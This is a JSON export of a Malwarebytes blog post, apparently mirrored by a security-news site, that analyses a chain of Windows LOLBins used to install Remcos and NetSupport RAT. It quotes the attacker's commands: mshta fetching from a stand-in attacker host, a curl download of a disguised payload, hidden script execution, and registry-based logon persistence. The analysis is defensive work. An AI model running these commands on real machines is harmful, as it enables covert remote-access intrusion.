{"id":36724,"date":"2026-01-21T12:44:54","date_gmt":"2026-01-21T12:44:54","guid":{"rendered":"http:\/\/localhost\/?p=36724"},"modified":"2026-01-21T12:44:54","modified_gmt":"2026-01-21T12:44:54","slug":"can-you-use-too-many-lolbins-to-drop-some-rats","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=36724","title":{"rendered":"Can you use too many LOLBins to drop some RATs?_MALWAREBYTES:7DB75EE503E7656F7F1BD410B5BBAEBA"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-21T18:05:12&#8243;,&#8221;description&#8221;:&#8221;Recently, our team came across an infection attempt that stood out\u2014not for its sophistication, but for how determined the attacker was to take a \u201cliving off the land\u201d approach to the extreme.\\n\\nThe end goal was to deploy **Remcos**, a Remote Access Trojan (RAT), and **NetSupport Manager**, a legitimate remote administration tool that\u2019s frequently abused as a RAT. The route the attacker took was a veritable tour of Windows\u2019 built-in utilities\u2014known as **LOLBins** (Living Off the Land Binaries).\\n\\nBoth Remcos and NetSupport are widely abused remote access tools that give attackers extensive control over infected systems and are often delivered through multi-stage phishing or infection chains.\\n\\nRemcos (short for Remote Control \\u0026 Surveillance) is sold as a legitimate Windows remote administration and monitoring tool but is widely used by cybercriminals. 
Once installed, it gives attackers full remote desktop access, file system control, command execution, keylogging, clipboard monitoring, persistence options, and tunneling or proxying features for lateral movement.\\n\\nNetSupport Manager is a legitimate remote support product that becomes \u201cNetSupport RAT\u201d when attackers silently install and configure it for unauthorized access.\\n\\nLet\u2019s walk through how this attack unfolded, one native command at a time.\\n\\n### **Stage 1: The subtle initial access**\\n\\nThe attack kicked off with a seemingly odd command:\\n\\n`C:\\\\Windows\\\\System32\\\\forfiles.exe \/p c:\\\\windows\\\\system32 \/m notepad.exe \/c \\&#8221;cmd \/c start mshta http:\/\/[attacker-ip]\/web\\&#8221;`\\n\\nAt first glance, you might wonder: why not just run `mshta.exe` directly? The answer lies in defense evasion.\\n\\nBy roping in `forfiles.exe`, a legitimate tool for running commands over batches of files, the attacker muddied the waters. This makes the execution path a bit harder for security tools to spot. In essence, one trusted program quietly launches another, forming a chain that\u2019s less likely to trip alarms.\\n\\n### **Stage 2: Fileless download and staging**\\n\\nThe `mshta` command fetched a remote HTA file that immediately spawned `cmd.exe`, which rolled out an elaborate PowerShell one-liner:\\n\\n`powershell.exe -NoProfile -Command`\\n\\n`curl -s -L -o \\&#8221;\\u003crandom\\u003e.pdf\\&#8221; [attacker-ip]\/socket;`\\n\\n`mkdir \\&#8221;\\u003crandom\\u003e\\&#8221;;`\\n\\n`tar -xf \\&#8221;\\u003crandom\\u003e.pdf\\&#8221; -C \\&#8221;\\u003crandom\\u003e\\&#8221;;`\\n\\n`Invoke-CimMethod Win32_Process Create \\&#8221;\\u003crandom\\u003e\\\\glaxnimate.exe\\&#8221;`\\n\\nHere&#8217;s what that does:\\n\\nPowerShell\u2019s built-in curl downloaded a payload disguised as a PDF, which in reality was a TAR archive. Then, `tar.exe` (another trusted Windows add-on) unpacked it into a randomly named folder. 
The star of this show, however, was `glaxnimate.exe`\u2014a trojanized version of real animation software, primed to further the infection on execution. Even here, the attacker relies entirely on Windows&#8217; own tools\u2014no EXE droppers or macros in sight.\\n\\n### **Stage 3: Staging in plain sight**\\n\\nWhat happened next? The malicious Glaxnimate copy began writing partial files to `C:\\\\ProgramData`:\\n\\n  * `SETUP.CAB.PART`\\n  * `PROCESSOR.VBS.PART`\\n  * `PATCHER.BAT.PART`\\n\\n\\n\\nWhy `.PART` files? It\u2019s classic malware staging. Drop files in a half-finished state until the time is right\u2014or perhaps until the download is complete. Once the coast is clear, rename or complete the files, then use them to push the next payloads forward.\\n\\n![Scripting the core elements of infection](https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2026\/01\/execution_chain.png?w=1024)Scripting the core elements of infection\\n\\n### **Stage 4: Scripting the launch**\\n\\nMalware loves a good script\u2014especially one that no one sees. Once fully written, Windows Script Host was invoked to execute the VBScript component:\\n\\n`\\&#8221;C:\\\\Windows\\\\System32\\\\WScript.exe\\&#8221; \\&#8221;C:\\\\ProgramData\\\\processor.vbs\\&#8221;`\\n\\nThe VBScript used IWshShell3.Run to silently spawn `cmd.exe` with a hidden window so the victim would never see a pop-up or black box. 
\\n\\n`IWshShell3.Run(\\&#8221;cmd.exe \/c %ProgramData%\\\\patcher.bat\\&#8221;, \\&#8221;0\\&#8221;, \\&#8221;false\\&#8221;);`\\n\\nThe batch file&#8217;s job?\\n\\n`expand setup.cab -F:* C:\\\\ProgramData`\\n\\nUse the `expand` utility to extract all the contents of the previously dropped `setup.cab` archive into ProgramData\u2014effectively unpacking the NetSupport RAT and its helpers.\\n\\n### **Stage 5: Hidden persistence**\\n\\nTo make sure their tool survived a restart, the attackers opted for the stealthy registry route:\\n\\n`reg add \\&#8221;HKCU\\\\Environment\\&#8221; \/v UserInitMprLogonScript \/t REG_EXPAND_SZ \/d \\&#8221;C:\\\\ProgramData\\\\PATCHDIRSEC\\\\client32.exe\\&#8221; \/f`\\n\\nUnlike old-school Run keys, `UserInitMprLogonScript` isn\u2019t a usual suspect and doesn&#8217;t open visible windows. Every time the user logged in, the RAT came quietly along for the ride.\\n\\n## Final thoughts\\n\\nThis infection chain is a masterclass in LOLBin abuse and proof that attackers love turning Windows\u2019 own tools against its users. Every step of the way relies on built-in Windows tools: `forfiles`, `mshta`, `curl`, `tar`, scripting engines, `reg`, and `expand`.\\n\\nSo, can you use too many LOLBins to drop a RAT? As this attacker shows, the answer is \u201cnot yet.\u201d But each additional step adds noise and leaves more breadcrumbs for defenders to follow. The more tools a threat actor abuses, the more unique their fingerprints become.\\n\\n**Stay vigilant. Monitor potential LOLBin abuse. And never trust a `.pdf` that needs `tar.exe` to open.**\\n\\nDespite the heavy use of LOLBins, Malwarebytes still detects and blocks this attack. 
It blocked the attacker\u2019s IP address and detected both the Remcos RAT and the NetSupport client once dropped on the system.\\n\\n![Malwarebytes blocks the IP 79.141.162.189](https:\/\/www.malwarebytes.com\/wp-content\/uploads\/sites\/2\/2026\/01\/blocked_IP.png)&#8221;,&#8221;published&#8221;:&#8221;2026-01-21T17:04:06&#8243;,&#8221;modified&#8221;:&#8221;2026-01-21T17:04:06&#8243;,&#8221;type&#8221;:&#8221;malwarebytes&#8221;,&#8221;title&#8221;:&#8221;Can you use too many LOLBins to drop some RATs?&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MALWAREBYTES:7DB75EE503E7656F7F1BD410B5BBAEBA&#8221;,&#8221;bulletinFamily&#8221;:&#8221;blog&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[],&#8221;sourceData&#8221;:&#8221;&#8221;,&#8221;sourceHref&#8221;:&#8221;&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.malwarebytes.com\/blog\/news\/2026\/01\/can-you-use-too-many-lolbins-to-drop-some-rats&#8221;,&#8221;category_name&#8221;:&#8221;News&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-21T18:05:12&#8243;,&#8221;description&#8221;:&#8221;Recently, our team came across an infection attempt that stood out\u2014not for its sophistication, but for how determined the attacker was to take a \u201cliving&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[6,8,12,115,13,33,7,11,5],"class_list":["post-36724","post","type-post","status-publish","format-standard","hentry","category-category_news","tag-cve","tag-cvss","tag-exploit","tag-malwarebytes","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"]}